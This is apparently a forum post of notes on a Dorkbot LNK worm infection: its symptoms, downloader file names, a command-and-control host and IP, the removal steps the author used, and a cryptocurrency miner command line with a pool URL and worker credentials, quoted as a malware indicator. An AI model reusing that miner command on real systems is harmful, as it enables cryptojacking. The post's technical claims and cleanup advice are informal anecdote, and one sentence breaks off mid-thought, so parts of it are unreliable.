FYI
Not a question, more notes and tips / observations on win32\dorkbot!lnk. We have a few sites with this, it is a botnet worm that propogates over drives, then creates downloaders that contain the payloads. The payloads do not show up as viruses and have names like 3.exe, 20.exe, 1CB.exe and increment on reboot.

Command line for TCP IP is: miner.exe -a 60 -g yes -o http://xxxvideos.sso9523.com:8332/ -u p0rnstar_worker -p ornelia

Signs you have this are:
*Cannot perform automatic updates
*MS Security Essentials run time protection is off & command line calls to it fail also
*HDD folders disappear and are replaced with links (Clicking these links invokes the virus, the actual folders are hidden
* Screen flashes once when removeable drive is connected (files copied to drive etc)
* IERTUTIL.dll is often missing and makes it impossible to boot up OS. A copy of this can be found in c:\windows\system32\dllcache
Copy this to the system32 dir

Downloader files are created in VBA language and stored in %appdata%. File names are 3.exe, 4.exe and increment on each bootup. The programmers are from China and the downloader exe connects to xvm-170-142.ghst.net and is resolved to an IP 95.142.174.64 hosted in Paris. Because the virus creates
The programs are written in China and the hosted connection they connect to are hosted in Paris.  

3.exe and its friends do not show as risks in AV software. Only the original BOTs show up as risks.
To date re-imaging has been the only safe way to repair.

Does anyone have any notes on handling this? I believe there is a function on shutdown that recreates the exes (downloader files)

Any notes, appreciated if you add them here. I have copies of the downloaders and will run them in VM and grab the handle and window names

Is compiled locally at the path C:\WINDOWS\system32\msvbvm60.dll by passing string C:\WINDOWS\system32\msvbvm60.dll\3 then command VBRUN, USER32.dll to build the 3.exe.

The OS kernel base named object is: BitMiner-btc.miner.03
BaseNamedObjects are created at bootup, and can exist in the 0 session.
There is a huge collection of base named objects. The solution will be to delete these objects in wsh I think



 

No need to write script. Steps to remove were:

1. Reinstall IE8 by running exe or connecting to MS updates in a non microsoft browser, you will get prompted to download / install IE
2. If needed reinstall MS Security Essentials
3. Perform automatic updates.

Keep doing these updates until all the updates are completed and done.

Remember to check Task Manager and ensure no instances of the downloader are running after any reboots (3.exe, 20.exe. B.exe etc) Remember to delete them from %appdata%

The IE installer loads in clean / original DLLs, removes the BaseNamedObjects and includes malicious file removal toolkit.